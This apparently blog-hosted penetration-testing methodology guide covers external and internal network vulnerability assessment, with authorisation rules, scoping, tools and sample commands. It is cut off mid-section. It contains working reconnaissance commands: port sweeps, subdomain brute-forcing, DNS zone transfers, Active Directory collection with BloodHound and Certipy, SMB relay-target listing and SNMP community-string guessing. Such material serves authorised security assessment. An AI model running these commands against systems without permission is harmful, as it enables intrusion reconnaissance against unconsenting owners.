network – Maharaj's weblog

Vulnerability Assessment & Penetration Testing

Master Reference — Four Engagement Types

This document is the authoritative operational bible for your VAPT team. It covers the complete lifecycle — scoping, methodology, tooling, execution, exclusions, legal obligations, and reporting — for all four core engagement types. Read and internalize the relevant section before every engagement.

Module 01 — Assessment

External Network VA

Systematic, non-exploitative identification and enumeration of vulnerabilities across all internet-facing infrastructure. No exploitation. No confirmed impact.

PASSIVE + ACTIVE SCAN NON-EXPLOITATIVE

→

Module 02 — Assessment

Internal Network VA

Internal asset discovery, service enumeration, Active Directory review, patch state assessment, and segmentation review — from a trusted insider vantage point. No exploitation.

AUTHENTICATED SCAN NON-EXPLOITATIVE

→

Module 03 — Penetration Test

External Network PT

Adversarial simulation of a real threat actor attacking the organisational perimeter from the internet. Active exploitation, initial foothold, lateral pivot. Strict RoE required.

ACTIVE EXPLOITATION ROE MANDATORY

→

Module 04 — Penetration Test

Internal Network PT

Simulation of a compromised insider or breached endpoint. Active Directory attacks, lateral movement, privilege escalation, domain dominance demonstration. Highest risk engagement.

FULL EXPLOITATION ROE MANDATORY

→

Master Definitions & Core Principles

🔍 Vulnerability Assessment (VA) — Canonical Definition

ℹ

Non-Exploitative — Assessment Only

A structured, systematic process of identifying, enumerating, categorising, and prioritising security weaknesses. VA operates exclusively in passive-to-semi-active discovery mode. Under no circumstances does a VA exercise involve confirmation of exploitability through active exploitation or payload delivery.

VA Output Must Include

Ranked vulnerability inventory (CVE/CWE mapped)
CVSS v3.1 / v4.0 / EPSS risk scores with contextual adjustments
Configuration and misconfiguration findings
Compliance gap mapping (CERT-In, PCI DSS, ISO 27001)
Version fingerprinting and EOL/EOS component identification
Remediation roadmap with prioritised action items

VA Must NEVER Include

Active exploitation of any identified vulnerability
Delivery of attack payloads (shellcode, confirmed SQLi, RCE)
Privilege escalation or credential-based authentication to targets
Lateral movement across network segments
Data exfiltration — even as proof-of-concept
Bypassing authentication controls to gain access
Any action that modifies, encrypts, deletes, or corrupts data

⚡ Penetration Testing (PT) — Canonical Definition

⚠

Active Exploitation — RoE Mandatory

A legally authorised, adversarial simulation in which a qualified tester actively attempts to exploit vulnerabilities to confirm real-world impact. PT extends beyond discovery into controlled exploitation, privilege escalation, lateral movement, and impact demonstration. No written RoE = No PT.

PT Core Activities

Active exploitation of vulnerabilities to confirm impact
Privilege escalation from low-privilege entry points
Lateral movement and pivoting across network segments
Credential theft and manipulation techniques
Post-exploitation persistence mechanism testing
Full attack chain simulation (MITRE ATT&CK aligned)
Social engineering simulation (where explicitly scoped)

Legal Anchor Points

India: IT Act 2000 Sec. 43, 66 — up to ₹1 crore + 3 years imprisonment
US: CFAA 18 U.S.C. § 1030 — federal criminal offence
UK: Computer Misuse Act 1990 — regardless of intent
CERT-In 2022: 6-hour breach reporting + 180-day log retention

VA vs PT Boundary — Universal Tipping Points

⚖Activity Classification Reference — When Does VA Become PT?

Activity	Classification	Rationale
Identifying an open port and grabbing its service banner	VA	Discovery/identification only — no access attempt
Attempting authentication with default credentials	PT	Active exploitation of credential risk — requires RoE
Running Nessus/Qualys unauthenticated scan against target	VA	Authorised scanner enumeration within defined scope
Running Nessus/Qualys authenticated scan (with credentials)	VA	Still VA — credentials provided by client, no exploitation
Detecting a Heartbleed-vulnerable OpenSSL via scanner signature	VA	Vulnerability identification — no memory extraction
Extracting memory contents via Heartbleed exploit	PT	Active data exfiltration from vulnerable service
DNS zone transfer attempt revealing internal hostnames	GREY	Zone transfer is a protocol function; treat finding as info disclosure; mapping for attack = PT
Identifying SMB shares without reading their contents	VA	Enumeration — no data access
Accessing/reading files on an SMB share	PT	Data access requires explicit RoE
Running BloodHound in read-only LDAP query mode	VA	AD enumeration using read-only queries with provided credentials
Performing Kerberoasting (requesting TGS for SPNs)	PT	Credential extraction attack — active exploitation
Identifying AS-REP Roastable accounts (DONT_REQ_PREAUTH)	VA	Configuration review — no hash extraction
Extracting AS-REP hashes and cracking them offline	PT	Active credential attack
Scanning for open RDP/SSH services on internet-facing IPs	VA	Port/service discovery
Password spraying against VPN, RDP, OWA, O365	PT	Active credential attack with risk of account lockout
Identifying SQL injection parameter via scanner error message	GREY	Scanner probe may trigger DB error — configure to avoid data-modifying payloads
Confirming SQL injection by retrieving table data (UNION SELECT)	PT	Exploitation with confirmed data access
Analysing SPF/DKIM/DMARC DNS records for misconfigs	VA	Passive DNS analysis
Sending a spoofed email demonstrating DMARC bypass	PT	Active exploitation — requires RoE and recipient awareness

Compliance & Regulatory Framework Alignment

🇮🇳India — Mandatory Regulatory Requirements

IT Act 2000 / ITA 2008

Sections 43, 66 — criminal liability for unauthorised access. Written auth mandatory.

CERT-In Directions 2022

6-hour breach reporting. 180-day log retention. VAPT by empanelled agencies for regulated entities.

RBI Cybersecurity Framework

Annual VAPT mandatory for banks, NBFCs, payment aggregators. CERT-In empanelled agency required.

SEBI CRF 2023

Bi-annual VAPT for MIIs. Quarterly for critical systems. Red team exercises for QSBs.

IRDAI 2023

Annual VAPT for insurers, TPAs. Scope includes portals, mobile apps, third-party APIs.

DPDP Act 2023

Data minimisation during testing. PII access during PT = potential breach notification required.

🌐Global — International Standards Alignment

ISO/IEC 27001:2022

Annex A Ctrl 8.8 — vulnerability management. Clause 9.1 — monitoring & measurement.

ISO/IEC 27005:2022

Risk assessment framework — VA findings feed risk treatment decisions for PT scope.

NIST SP 800-115

Definitive technical guide to information security testing. VA = examination. PT = active testing.

NIST SP 800-53 Rev5

CA-8: PT control. RA-5: Vulnerability monitoring and scanning. Defined frequencies required.

PCI DSS v4.0

Req 11.3: Internal & external VA scans. Req 11.4: Annual PT with network + app layer coverage.

MITRE ATT&CK v14

Tactics, Techniques & Procedures (TTPs) framework. Mandatory reference for PT planning and reporting.

📋 Rules of Engagement (RoE) — Non-Negotiable Minimum Requirements for ALL PT Engagements

Written authorisation from asset owner (CIO/CISO-level or above for high-risk)
Explicit scope: IP ranges, hostnames, URLs, cloud account IDs, environments (prod vs staging)
Explicit out-of-scope declaration: third-party systems, production DBs, payment systems
Permitted techniques and tools (exploitation frameworks, SE, physical access)
Prohibited techniques (destructive payloads, ransomware simulation, DDoS)
Testing window: dates, times, time zones

Emergency stop / abort procedure and 24/7 escalation contacts
IR coordination — SOC/SIEM awareness or explicit black-box blinding agreement
Data handling clauses — no real data exfiltration, evidence destruction post-engagement
Jurisdiction and governing law clause
Cloud provider notification (AWS, Azure, GCP have specific testing notification policies)
Third-party system notification where applicable (CDN, WAF providers, co-lo neighbours)

🔴

Absolute Rule — Zero Exceptions

Any exploitation activity without a signed, complete RoE constitutes an unauthorised intrusion under IT Act 2000 (India), CFAA (US), and CMA (UK). This applies even when a VA has already identified the vulnerability, even when management verbally approves, and even when the system "belongs" to the organisation. The signed document is the only legal protection for the tester.

Module 01 // Non-Exploitative Assessment

External Network Vulnerability Assessment

Systematic, authorised enumeration and identification of security weaknesses across all internet-facing infrastructure. Operates entirely in detection mode — no confirmation of exploitability, no active exploitation, no authentication to target services.

NIST SP 800-115 §4 ISO 27005:2022 Risk ID PCI DSS v4.0 Req.11.3 CERT-In Phase 1 NON-EXPLOITATIVE

Phases

60+

Check Items

25+

Tools

Scope Definition & Pre-Engagement

MANDATORY FIRST STEP ▼

⚠

Authorisation Prerequisite

Even for VA (non-exploitative), written authorisation from the asset owner is mandatory. Scanning infrastructure without authorisation constitutes an offence under IT Act 2000 and CFAA, regardless of intent. VA authorisation document must be signed before any scanning activity begins.

✓ Typically IN SCOPE — External Network VA

All IP ranges and CIDR blocks owned by the organisation (confirmed via WHOIS/ARIN/RIPE)
Public-facing web servers, mail servers, DNS servers, VPN gateways
Internet-accessible management interfaces (if intentionally public)
Organisation's registered domain names and all discovered subdomains
Cloud-hosted assets (AWS EIPs, Azure Public IPs, GCP External IPs) confirmed as org-owned
CDN-fronted assets where client has provided written CDN provider consent
All TCP/UDP ports on in-scope IP ranges
SSL/TLS configuration on all HTTPS services
DNS infrastructure (authoritative DNS servers for org's zones)
Email security posture (SPF, DKIM, DMARC records)
BGP/ASN information gathering (passive)
Certificate Transparency records
OSINT-based asset discovery (Shodan, Censys, SecurityTrails)

✗ ALWAYS OUT OF SCOPE — External Network VA

IP ranges belonging to third parties, hosting neighbours, ISP infrastructure
Shared hosting environments where org's IPs overlap with other tenants
Cloud provider management planes (AWS Console, Azure Portal — these are cloud provider infrastructure)
CDN provider infrastructure (Cloudflare, Akamai edge nodes not explicitly approved)
Payment processor infrastructure (Visa, Mastercard network endpoints)
Third-party SaaS platforms the org uses (Salesforce, ServiceNow, etc.) — unless separate written approval from that vendor
ISP/telco infrastructure upstream of the org's border
Any IP range not explicitly listed in the signed authorisation document
Systems flagged as life-safety or critical infrastructure (SCADA, medical devices)

Pre-Engagement Checklist

Obtain signed VA authorisation letter specifying exact IP ranges and domains
Confirm legal entity and asset ownership for all in-scope IPs (WHOIS verification)
Define testing window (dates, times, time zones) — coordinate with client's IT ops
Identify and document all out-of-scope systems and adjacent IP ranges
Confirm whether production systems are in scope or staging-only
Notify client's SOC/NOC about scheduled scanning (prevent false incident response)
For cloud-hosted assets: verify cloud provider acceptable use policy compliance

Confirm rate-limiting expectations (avoid triggering DDoS protections)
Establish emergency abort procedure and 24/7 escalation contact
Verify no maintenance windows, critical business events during testing period
Set up isolated tester environment — dedicated VM/network, no personal traffic
Configure VPN or dedicated source IP for scanning (for whitelisting if needed)
Verify all tools are up-to-date with current vulnerability databases
Prepare documentation templates: findings log, risk register, evidence capture

OSINT & Passive Reconnaissance

PASSIVE — No Direct Contact ▼

Passive reconnaissance involves gathering intelligence about the target without directly interacting with the target's systems. All data is collected from publicly available sources. This phase carries minimal legal risk but must still be performed within the scope of the engagement.

DNS & Domain Intelligence

WHOIS lookups for all registered domains — identify registrar, registration dates, contact info
Reverse WHOIS — find all domains registered to same email/org
DNS record enumeration: A, AAAA, MX, NS, TXT, SOA, CNAME, PTR
DNS history analysis via SecurityTrails, PassiveDNS, dnshistory.io
Certificate Transparency logs (crt.sh, Facebook CT, Google CT) — enumerate subdomains
BGP/ASN lookups: bgp.he.net, RIPE, ARIN, APNIC — map org's full IP space
Amass Intel module for org-wide asset discovery
Subdomain enumeration via passive sources (subfinder, amass passive mode)

# Certificate Transparency — subdomain discovery
curl -s "https://crt.sh/?o=TargetOrg&output=json" | jq -r '.[].name_value' | sort -u

# Amass intel passive ASN discovery
amass intel -org "Target Organisation Name"
amass intel -asn 12345 -whois

# Subfinder — passive subdomain enumeration
subfinder -d target.com -o subdomains_passive.txt -all

# SecurityTrails DNS history
curl -H "apikey: YOURKEY" "https://api.securitytrails.com/v1/history/target.com/dns/a"
        

ASN & IP Range Intelligence

Identify all ASNs owned by the organisation
Map all CIDR ranges within those ASNs
Cross-reference with BGP routing tables (bgp.he.net, RIPE RIS)
Shodan ASN filter: asn:AS12345 for exposed services
Censys.io — certificate-based IP enumeration for org's assets
TLSX for TLS certificate grabbing across IP ranges

Google Dorks & Search Intelligence

site:target.com -site:www.target.com — non-www subdomains
site:*.target.com — all subdomains indexed
filetype:pdf site:target.com — document metadata
intitle:"index of" site:target.com — directory listings
Wayback Machine / archive.org — historical site snapshots
Google cache — recently removed content
Bing dorks for supplementary indexing

Credential & Leak Intelligence

dehashed.com / breach-parse — check for leaked credentials in breaches
Pastebin monitoring for domain-related leaks
GitHub/GitLab/Bitbucket — public repos for accidental credential commits
gitleaks / trufflehog against public repos
LinkedIn — employee enumeration, technology stack inference
hunter.io / phonebook.cz — email format discovery

Tools Reference — Passive Phase

amass

Asset discovery via passive DNS, APIs, certificates

RECON

subfinder

Passive subdomain enumeration via 50+ sources

SUBDOMAIN

theHarvester

Email, subdomain, IP, URL harvesting

RECON

crt.sh

Certificate transparency subdomain discovery

CERT/DNS

Shodan

Internet-connected device search engine

PASSIVE SCAN

Censys.io

Certificate and protocol-based asset discovery

PASSIVE SCAN

SecurityTrails

DNS history, passive DNS, domain intelligence

DNS

Spiderfoot

Automated OSINT across 200+ data sources

OSINT

TLSX

TLS certificate grabbing across IP/CIDR ranges

TLS/CERT

Metabigor

IP ranges, ASN, threat intel aggregation

OSINT

recon-ng

Web-based OSINT framework with modules

OSINT

FOCA / PowerMeta

Document metadata extraction for exposed files

METADATA

Active Scanning & Enumeration

ACTIVE — Direct Contact, No Exploitation ▼

ℹ

Active Scanning Guidance

Active scanning directly contacts target systems. This is permitted in VA but must remain non-exploitative. Scanner payloads must not modify system state. Configure all scanners to exclude SQL injection data-modification probes, destructive checks, and brute-force modules. Always scan at moderate speed — aggressive scanning can constitute a DoS.

Host Discovery & Port Scanning

ICMP ping sweep to identify live hosts (note: many block ICMP externally)
TCP SYN scan (-sS) on all in-scope IP ranges — most common external VA starting point
Full port scan (1-65535) on critical/high-priority targets
Top-1000 port scan for initial broad sweep
UDP scan on key UDP services: DNS (53), SNMP (161), NTP (123), DHCP (67/68), RIP (520)
Masscan for high-speed initial port discovery across large IP ranges
Service version detection (-sV) after open ports identified
OS detection (-O) where feasible

# Masscan — fast initial port discovery (external target)
masscan 203.0.113.0/24 -p 1-65535 --rate 1000 -oG masscan_results.txt

# Nmap — service version + default scripts (safe category only)
nmap -sS -sV -sC -p 22,80,443,25,53,3389,8080,8443 --open -Pn
     -T3 203.0.113.0/24 -oA nmap_external_initial

# Nmap — full port scan on priority targets (slower)
nmap -sS -p- -Pn --open -T3 203.0.113.10 -oA nmap_fullport_target

# UDP scan — key services
nmap -sU -p 53,161,123,500,1194,4500 -Pn 203.0.113.10
        

Nmap Key Options for External VA

Flag

Purpose

-sS

SYN (half-open) scan — stealthier than full connect

-Pn

Skip host discovery (assume host up) — needed when ICMP blocked

-T3

Normal timing — balance speed vs. detection risk

-sV

Service version detection — critical for CVE mapping

-sC

Default NSE scripts (safe category) — additional enumeration

--open

Report only open ports — reduces noise

-oA

Output all formats (normal, XML, grepable) — for importing to MSF/Nessus

🚫

Never Use During VA Phase

-T5 (insane timing — DoS risk), --script=dos (DoS category), --script=exploit (exploit category), --script=brute (brute force). These cross into PT territory or cause unacceptable disruption.

Subdomain Enumeration (Active)

DNS brute-force using wordlists (aiodnsbrute, dnsx, dnsrecon)
Amass active mode with DNS resolution and permutations
HTTP/HTTPS probing of all discovered subdomains
Screenshot capture (Aquatone, EyeWitness, GoWitness) for visual inventory
Virtual host enumeration — check for vhosts not returned in default DNS
Subdomain takeover scanning (subjack, nuclei takeover templates)
DNSSEC validation status check
Wildcard DNS detection and handling

# Active DNS brute-force with aiodnsbrute
aiodnsbrute -t 20 target.com -o csv -f subdomains
             -w ./subdomains-top1million-110000.txt

# dnsx — DNS probing + resolution
cat subdomains_passive.txt | dnsx -resp -a -aaaa -mx -ns -cname

# GoWitness — screenshot all live subdomains
gowitness file -f live_subdomains.txt --write-db

# Subdomain takeover check
subjack -w subdomains.txt -t 100 -timeout 30 -o takeover_results.txt -ssl
        

Vulnerability Scanning

Nessus / Tenable.sc — comprehensive CVE mapping against discovered services
Qualys External Scanner — external-only unauthenticated scan profile
Nuclei — template-based vulnerability detection (CVE, misconfig, exposure templates)
Nikto — web server misconfiguration detection
wpscan for WordPress installations (if detected)
joomscan for Joomla installations

# Nuclei — run CVE and exposure templates
nuclei -list live_hosts.txt -t cves/ -t exposures/ -t misconfigurations/
       -severity critical,high,medium -o nuclei_results.json -json

# Nikto — web server checks (VA-safe)
nikto -h https://target.com -C all -Format htm -output nikto_output.html
        

Service-Specific Checks — External VA

🔒 SSL/TLS Assessment

Certificate validity, expiry, chain of trust
Weak cipher suites (RC4, DES, 3DES, NULL)
Protocol versions: SSLv2, SSLv3, TLS 1.0, TLS 1.1 (should be disabled)
Heartbleed (CVE-2014-0160) — OpenSSL 1.0.1–1.0.1f
POODLE (CVE-2014-3566) — SSLv3 enabled
BEAST, CRIME, BREACH, ROBOT vulnerabilities
Certificate Subject Alternative Names vs. hostname
HSTS header presence and preload status
HPKP (if implemented — check for misconfiguration)

testssl.sh --fast target.com
sslscan target.com
sslyze target.com --json_out=ssl.json
          

📧 Email Security (SMTP)

SPF record existence and policy strictness (-all vs ~all vs ?all)
DKIM record existence for all mail-sending domains
DMARC record and enforcement policy (p=none vs quarantine vs reject)
DMARC reporting configured (rua/ruf)
Open relay check (VRFY, EXPN commands enabled)
SMTP banner information disclosure
STARTTLS availability and enforcement
MX record discovery and priority mapping

# Check SPF/DKIM/DMARC
python3 spoofy.py -d target.com -o stdout
dig TXT _dmarc.target.com
dig TXT _domainkey.target.com
          

🌐 DNS Security

DNS zone transfer attempt (AXFR) — misconfig allows full zone dump
DNS version disclosure (CHAOS TXT record)
DNSSEC implementation review
DNS recursive query allowed externally (open resolver)
DNS amplification potential (ANY queries accepted)
Dangling DNS records pointing to decommissioned services
Subdomain takeover via DNS CNAME to deregistered third-party services

# Zone transfer attempt
dig @ns1.target.com -t axfr target.com
fierce --dns target.com
          

🔐 VPN & Remote Access

VPN gateway identification (Cisco ASA, Juniper, Palo Alto, Fortinet, Citrix)
IKE version detection (IKEv1 vs IKEv2)
IKEv1 Aggressive Mode enabled (hash disclosed without auth)
CheckPoint VPN detection and version fingerprinting
Pulse Secure / Ivanti / SSL VPN identification
RDP (3389) exposed to internet — NLA enforcement check
SSH version, key exchange algorithms, cipher suites
Citrix Gateway detection

# IKE detection
ike-scan --aggressive vpn.target.com
nmap -sU -p 500,4500 --script ike-version target.com
          

🗄 Exposed Services & Protocols

FTP — anonymous access, banner disclosure, cleartext credentials
Telnet — cleartext protocol exposed to internet
SNMP — public/private community strings, v1/v2c (unencrypted), open UDP 161
Databases exposed to internet: MySQL (3306), MSSQL (1433), PostgreSQL (5432), MongoDB (27017), Redis (6379), Elasticsearch (9200)
RDP (3389) — NLA check, BlueKeep CVE-2019-0708 (Win7/2008)
SMB (445) — EternalBlue CVE-2017-0144 (if older Windows exposed)
LDAP/LDAPS (389/636) — anonymous bind permitted
NFS shares (2049) — exported to 0.0.0.0
Docker API (2375/2376) — unauthenticated remote management

☁ Cloud & Storage Exposure

AWS S3 bucket enumeration — public read/write access
Azure Blob Storage — public container access
GCP Storage — allUsers / allAuthenticatedUsers permissions
Cloud metadata endpoint exposure (169.254.169.254) via SSRF detection patterns
Exposed cloud management console login pages
AWS API Gateway endpoints — rate limiting and auth mechanisms
Kubernetes API server (6443, 8080) — unauthenticated access

# Cloud asset enumeration
cloud_enum.py -k targetorg --disable-gcp
MicroBurst  # Azure-specific discovery
          

Vulnerability Analysis & Risk Scoring

ANALYSIS ▼

CVE/CWE Mapping Requirements

Map every finding to CVE ID (if applicable) via NVD, MITRE CVE database
Map to CWE ID for root cause classification
Assign CVSS v3.1 Base Score — use official NVD calculator, do not estimate
Apply CVSS Temporal Score adjustments (Exploit Code Maturity, Remediation Level)
Apply CVSS Environmental Score for org-specific impact adjustments
Cross-reference EPSS (Exploit Prediction Scoring System) scores from FIRST.org
Check CISA KEV (Known Exploited Vulnerabilities) catalog — these get highest priority
Validate findings against service version — eliminate false positives

Risk Classification

CVSS Score

Rating

SLA for Remediation

9.0 – 10.0Critical15 days (or immediate if CISA KEV) 7.0 – 8.9High30 days 4.0 – 6.9Medium60–90 days 0.1 – 3.9LowNext maintenance cycle 0.0InformationalBest practices / optional

False Positive Validation

Validate version-based findings: confirm actual version string vs. reported version
Banner grabbing alone is insufficient — verify via multiple methods
Scanner false positives are common for patched systems with unchanged banners
Cross-reference Nessus/Qualys results with manual verification
Document methodology for each finding — evidence must be reproducible

Required Evidence Per Finding

Screenshot or raw output showing the vulnerability
Tool name, version, and command/configuration used
IP address, port, and service where finding was observed
Date and time of discovery (UTC)
CVE/CWE reference
CVSS base score with vector string
Remediation recommendation (vendor patch, configuration change, compensating control)

What NOT to Do in Reporting

Never claim exploitability without active exploitation evidence (that's PT, not VA)
Never exaggerate CVSS scores to inflate severity
Never include findings from out-of-scope systems
Never share VA reports with unauthorised parties — classify as CONFIDENTIAL
Never retain client data beyond contractual data retention period

Reporting & Deliverables

FINAL DELIVERABLE ▼

Report Structure (NIST SP 800-115 Aligned)

Executive Summary: Non-technical overview, overall risk posture, top 3–5 findings, business impact statement, compliance gap summary
Scope & Methodology: Exact IP ranges, domains tested, tools used, scan dates/times, assessment type, tester names and qualifications
Findings Summary: Vulnerability count by severity (Critical/High/Medium/Low/Info), heat map or risk matrix
Detailed Findings: One page per finding — title, severity, CVE, affected asset, description, evidence (screenshots), business impact, remediation recommendation, references
Remediation Roadmap: Prioritised action plan, quick wins vs. long-term fixes, compliance alignment
Appendices: Raw scan outputs, tool configurations, full asset inventory discovered

Compliance Reporting Requirements

PCI DSS: Scan must be conducted by Approved Scanning Vendor (ASV) for external quarterly scans. Report format must meet PCI ASV requirements.
RBI/SEBI: Report to be submitted to CISO and Board-level Risk Committee. Retain for minimum 3 years.
CERT-In: Critical findings with CVSS ≥9.0 may require separate CERT-In notification if they represent a systemic vulnerability in regulated infrastructure.
ISO 27001: VA findings feed into the Statement of Applicability (SoA) and risk treatment plan.

Post-VA Actions

Conduct debrief with client's IT/security team before final report
Agree on remediation timelines and responsible owners per finding
Schedule re-scan/retest after remediation of Critical and High findings
Securely destroy all copies of client data collected during assessment
Archive assessment records per contractual retention requirements

Module 02 // Non-Exploitative Assessment

Internal Network Vulnerability Assessment

Assessment of internal network infrastructure, Active Directory, workstations, servers, and segmentation controls from a trusted insider vantage point. Authenticated scanning preferred. No exploitation of findings, no lateral movement, no credential extraction.

NIST SP 800-53 RA-5 ISO 27001 A.8.8 PCI DSS v4.0 Req.11.3 AUTHENTICATED SCAN NON-EXPLOITATIVE

Phases

70+

Check Items

20+

Tools

Scope Definition & Pre-Engagement

MANDATORY FIRST STEP ▼

⚠

Internal VA — Insider Access Requirement

Internal VA is conducted from within the network (via physical access, VPN, or jump box). Even though performed "inside," formal written authorisation is mandatory. The tester must be provided with a dedicated scan account with appropriate read permissions. Do NOT reuse production admin credentials for scanning.

✓ Typically IN SCOPE — Internal Network VA

All internal IP ranges (RFC 1918: 10.x.x.x, 172.16–31.x.x, 192.168.x.x)
Active Directory infrastructure (Domain Controllers, ADCS, ADFS)
Internal servers: file servers, application servers, database servers, print servers
Network devices: routers, switches, firewalls (if configuration review is scoped)
Workstations and endpoints (if in scope — may be excluded for performance reasons)
Internal web applications and portals
VoIP infrastructure (if in scope)
OT/SCADA systems (only if explicitly scoped AND with engineering team present)
Network segmentation review — which VLANs can reach which
Wireless network infrastructure (if scoped)
Management networks (IPMI, iDRAC, ILO — often forgotten)
Backup infrastructure (Veeam, Commvault — often contains domain credentials)

✗ ALWAYS OUT OF SCOPE — Internal Network VA

Production databases containing live PII/financial data — use staging unless explicitly approved with data minimisation controls
OT/SCADA/ICS systems without dedicated engineering supervision and explicit RoE
Medical devices, life-safety systems, physical security systems
Payment processing systems during live transaction periods without approved maintenance window
Systems belonging to subsidiary companies or joint ventures unless explicitly authorised by that entity
Third-party managed systems (outsourced vendors' systems co-located in client's data centre)
Any system not covered by the signed authorisation document
Active Directory objects: scanner must NOT modify AD objects, group memberships, GPOs, or ACLs

Pre-Engagement Setup for Internal VA

Obtain signed internal VA authorisation covering all internal IP ranges
Request dedicated scan account: domain user with local admin on scan targets (for authenticated scanning) — document credentials securely
Obtain network topology diagram (or create one as part of assessment)
Identify all VLANs and network segments in scope
Coordinate with Active Directory team — BloodHound enumeration generates LDAP queries; notify in advance
Confirm whether endpoint scans are included (can be noisy on workstation VLANs)
Agree on scanning window — preferably off-hours for authenticated scanning (high CPU on targets)

Place scanner on a trusted network segment — ideally server VLAN with access to all in-scope segments
Configure Nessus/Qualys with provided domain credentials for authenticated scanning
Exclude any explicitly out-of-scope IPs from scanner configuration
Confirm whether OT/SCADA segments exist and are explicitly excluded
Establish emergency abort contact — internal IT ops team, not just security
Verify AV/EDR exclusions for scanner (Nessus agent, scan source IP) to avoid false positives in SIEM
Notify SOC of scan window to prevent incident response for scan traffic

Host Discovery & Asset Inventory

ACTIVE DISCOVERY ▼

Network Host Discovery

ARP scan within same subnet (most reliable for internal hosts)
ICMP ping sweep across all in-scope IP ranges
TCP SYN scan to identify live hosts where ICMP is filtered
NetBIOS/NBNS enumeration for Windows host discovery
SNMP community string query for device discovery
DNS reverse lookup for all discovered IPs
DHCP lease review (with client's DHCP team) for additional asset discovery
mDNS/Bonjour discovery for rogue/unmanaged devices

# ARP scan — reliable for same-subnet discovery
arp-scan --interface=eth0 10.10.0.0/16

# Nmap — internal host discovery with version
nmap -sn 10.10.0.0/16 -oG hosts_alive.txt
nmap -sS -sV -p 22,80,443,445,3389,8080,1433,3306
     --open -T3 -iL hosts_alive.txt -oA internal_scan

# NBTScan — NetBIOS host enumeration
nbtscan 10.10.0.0/16

# CrackMapExec — SMB host discovery (read-only)
cme smb 10.10.0.0/16 --timeout 5
        

Asset Classification Matrix

Build an asset inventory during discovery — classify each host:

DC — Domain Controller (highest priority)
ADCS — Active Directory Certificate Services
ADFS — Active Directory Federation Services
APP — Application / Web Server
DB — Database Server
FS — File Server
WS — Workstation / Endpoint
NW — Network Device (router/switch/FW)
MGMT — Management Interface (IPMI/iDRAC)
OT — OT/SCADA (out of scope unless explicit)

SMB & Windows Enumeration (Read-Only)

SMB signing status — not enforced = relay attack surface
SMBv1 presence — EternalBlue vulnerability surface
Null session access (anonymous SMB login)
Accessible shares via enumeration (not reading contents)
OS version via SMB banner / NTLM challenge packet

# Check SMB signing across subnet
nmap --script smb2-security-mode.nse 10.10.0.0/24
cme smb 10.10.0.0/24 --gen-relay-list no_signing.txt
        

Authenticated Scanning & Service Enumeration

AUTHENTICATED — Deep Assessment ▼

ℹ

Authenticated vs Unauthenticated Scanning

Authenticated (credentialed) scanning is strongly preferred for internal VA. It provides 60–80% more findings than unauthenticated scanning by reading local patch state, installed software, registry values, and configuration files. Always use a dedicated low-privilege scan account — do NOT use Domain Admin credentials for Nessus/Qualys.

Authenticated Scan Configuration (Nessus)

Create a dedicated scan account: domain user + local admin on all scan targets (WMI/SMB required)
Enable WMI on targets (or confirm it's enabled) — required for Windows authenticated scans
Configure SSH key-based auth for Linux/Unix targets
Use Nessus "Advanced Scan" template with all plugin families enabled except DoS
Enable "Safe Checks" — should already be on by default
Exclude DoS, Compliance, and Malware plugin families during VA (these are out of scope or separate)
Schedule scan for off-peak hours — authenticated scans generate significant CPU on targets
Run in segments if target count is large — prevents network saturation

Windows-Specific Checks

Missing patches — Windows Update status via WMI
Installed software inventory and EOL detection
Services running as SYSTEM with excessive privileges
Scheduled tasks running elevated/unusual commands
Local Administrator password policy and reuse (LAPS deployment status)
Windows Firewall status and rule misconfigurations
RDP settings — NLA enforcement, concurrent session limits
SMBv1 enabled check (should be disabled on all hosts)
LLMNR / NBT-NS enabled (enables NTLM relay attacks)
PowerShell execution policy and constrained language mode
Credential Guard / LSA Protection enabled
Print Spooler service running on non-print servers (PrintNightmare)
Windows Script Host enabled
AutoRun / AutoPlay settings

Active Directory Enumeration (Read-Only VA)

⚠

AD enumeration in VA mode uses read-only LDAP queries only. BloodHound must be run in collection mode that does NOT trigger brute-force or exploitation. Do NOT perform Kerberoasting, AS-REP Roasting, or any credential extraction — these are PT activities.

BloodHound collection (SharpHound / bloodhound-python) — identifies attack paths via read-only LDAP
Enumerate privileged group memberships: Domain Admins, Enterprise Admins, Schema Admins, Account Operators, Backup Operators, Server Operators, DNSAdmins
Identify accounts with DONT_REQ_PREAUTH set (AS-REP Roasting candidates) — report, do NOT extract
Identify accounts with SPNs set (Kerberoasting candidates) — report, do NOT request TGS
Identify unconstrained delegation computers — high-risk configuration
Identify constrained delegation configurations — map delegation paths
ADCS certificate template review via Certipy (find mode only — no exploitation)
GPO misconfiguration review — identify GPOs with overly permissive settings
Password policy check — minimum length, complexity, lockout settings
Stale/inactive accounts (90+ days) — identify, report for deprovisioning
Service accounts with excessive privileges
AdminSDHolder protected objects vs. intended members
Domain trusts mapping — identify all domain and forest trusts
LAPS deployment status — identify computers not covered by LAPS

# BloodHound — read-only AD collection (VA mode)
bloodhound-python -u scanuser -p 'P@ssword'
  -d corp.local -ns 10.10.0.1
  -c DCOnly,Group,Acl,Trusts

# ADCS — find vulnerable templates (no exploitation)
certipy find -u scanuser@corp.local -p 'P@ssword'
  -dc-ip 10.10.0.1 -stdout -vulnerable

# LDAP enumeration — password policy
ldapsearch -x -H ldap://dc01.corp.local
  -D "scanuser@corp.local" -w 'P@ssword'
  -b "DC=corp,DC=local" "(objectClass=domain)"
  maxPwdAge minPwdLength lockoutThreshold
        

Network Segmentation & Infrastructure Review

Segmentation Assessment

Map reachability between VLANs — identify where there should be firewalls but aren't
Verify that DMZ servers cannot initiate connections to internal LAN (common misconfiguration)
Verify that guest/BYOD WiFi is isolated from production VLANs
Verify that OT/SCADA segments are fully isolated (air-gapped or strictly firewalled)
Check for dual-homed hosts that bridge security zones (printer, scanner, VM with multiple NICs)
Review firewall rule sets (if provided as configuration documents) — identify overly permissive rules
Identify management plane access — who can reach IPMI/iDRAC/ILO from where
Verify that backup servers have minimal network access (ransomware pivot risk)

# Traceroute to map paths between segments
traceroute 10.20.0.1  # from server VLAN to DB VLAN

# Nmap — check if port is accessible cross-segment
nmap -p 3306,1433,5432,27017 10.20.0.0/24
      # (run from workstation VLAN — should be blocked)
        

SNMP & Network Device Assessment

SNMP v1/v2c — check for default/weak community strings (public, private, community, cisco)
SNMP v3 — verify authentication and encryption requirements
SNMP response reveals routing table, interface list, ARP table, process list
onesixtyone / snmpwalk for community string enumeration
Network device management access — Telnet vs SSH (Telnet is cleartext)
Default credentials on switches/routers (Cisco: admin/cisco, enable/enable)
CDP/LLDP enabled — reveals network topology to any connected device

# SNMP community string check (VA — read only, no modification)
onesixtyone -c community_strings.txt 10.10.0.0/24

# snmpwalk — extract device info (with valid community string)
